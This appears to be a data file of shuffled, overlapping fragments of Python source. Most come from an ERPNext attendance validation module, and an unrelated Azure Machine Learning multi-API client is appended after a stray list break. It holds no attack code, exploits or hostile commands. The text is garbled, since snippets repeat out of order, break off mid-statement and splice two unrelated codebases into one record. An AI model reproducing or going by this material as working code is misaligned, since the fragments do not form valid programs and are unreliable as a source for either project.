1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0}", "> getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining and", "date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be", "2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License", "from __future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe", "GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe", "not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status,", "date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s", "Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No", "def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s and", "found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee,", "def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and", "Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See", "from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res", "_ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self):", "date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's", "employee = %s and attendance_date = %s and name != %s and docstatus", "as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half", "status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or", "validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not", "date can not be less than employee's joining date\")) def validate_employee(self): emp =", "self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found", "Application` where employee = %s and %s between from_date and to_date and docstatus", "on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave", "where employee = %s and attendance_date = %s and name != %s and", "class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee =", "{0} is not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import", "= %s and attendance_date = %s and name != %s and docstatus =", "on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0}", "Ltd. and Contributors # License: GNU General Public License v3. See license.txt from", "else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on", "for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) >", "if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record", "if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day", "frappe from frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document import", "validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date", "getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining date\")) def validate_employee(self):", "can not be less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select", "= leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On", "= 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day'", "import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select", "<reponame>Semicheche/foa_frappe_docker<filename>frappe-bench/apps/erpnext/erpnext/hr/doctype/attendance/attendance.py # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License:", "emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def validate(self): from", "def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee =", "Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General", "import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def", "name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance", "half_day from `tabLeave Application` where employee = %s and %s between from_date and", "employee = %s and %s between from_date and to_date and docstatus = 1\"\"\",", "self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status ==", "v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import getdate,", "already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application`", "`tabAttendance` where employee = %s and attendance_date = %s and name != %s", "getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date)", "exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half", "does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On", "if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee,", "less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee`", "# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU", "(c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public", "on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type =", "%s and attendance_date = %s and name != %s and docstatus = 1\"\"\",", "between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record:", "\"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee {0} for", "docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half", "{1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()):", "leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s and", "from frappe import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class", "self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future", "leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on", "{0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type", "Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s", "= frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked", "from `tabAttendance` where employee = %s and attendance_date = %s and name !=", "for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\")", "getdate, nowdate from frappe import _ from frappe.model.document import Document from erpnext.hr.utils import", "== \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee {0}", "validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s and status", "set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee", "erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance`", "self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self):", "self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee,", "getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining date\"))", "import getdate, nowdate from frappe import _ from frappe.model.document import Document from erpnext.hr.utils", "{1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record", "1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee))", "and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active", "import unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe import _", "frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for", "{0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date)", "= %s and %s between from_date and to_date and docstatus = 1\"\"\", (self.employee,", "%s and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if", "`tabEmployee` where name = %s and status = 'Active'\", self.employee) if not emp:", "\"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\"))", "not be less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name", "{0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from", "= %s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is", "import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where", "where employee = %s and %s between from_date and to_date and docstatus =", "if not emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def", "self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave", "not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\",", "attendance_date = %s and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date,", "leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\"", "def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can", "= 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already", "= frappe.db.sql(\"select name from `tabEmployee` where name = %s and status = 'Active'\",", "= 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or does", "__future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe import", "frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s and %s between", "be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date", "%s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not", "employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name", "Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On", "(self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self)", "See license.txt from __future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate", "import frappe from frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document", "`tabLeave Application` where employee = %s and %s between from_date and to_date and", "Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type", "'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status =", "self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee", "is not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status", "for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type,", "License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import", "marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can", "< getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining date\")) def", "name = %s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0}", "self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else:" ]
[ "'2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import", "not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self):", "does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version", "pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on Azure", "from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not", "..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass", "\"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans')", "@property def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\"", "{} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return", "Credential needed for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param", "the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version ==", "import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as", "the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version ==", "version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version", ":class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations", "..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models", "import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This", "version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version =", "API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0':", "@property def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\"", "models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0:", "depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version", "from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview':", "have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance", "the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version ==", "elif api_version == 'v1.0': from ..registry_discovery import models return models elif api_version ==", "api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from", "raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config,", "else: raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client,", "RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "= self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif", "cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API", "code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>`", "api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass", "version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>`", "elif api_version == 'v1.0': from ..runhistory import models return models elif api_version ==", "group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on", "the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` *", "described in the profile. :param credential: Credential needed for the client to connect", "group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on", "raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version == '1.5.0': from ..dataset_dataplane import models return models elif api_version == '1.0.0':", "import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version", "1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not", "2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if", "\"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as", "import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return", "not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self):", "profile: A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int", "License.txt in the project root for # license information. # # Code generated", "not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self):", "{} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>`", "on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version", "import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "= self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif", "* 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\"", ":mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return models elif", "..dataset_dataplane import models return models elif api_version == '1.0.0': from ..model_dataplane import models", "def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version", "group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on", "import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as", "version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version ==", "1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance", "import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API", "models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models", "Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>`", "api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass", "* 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "= self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif", ":class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version", "from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from", "* 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = 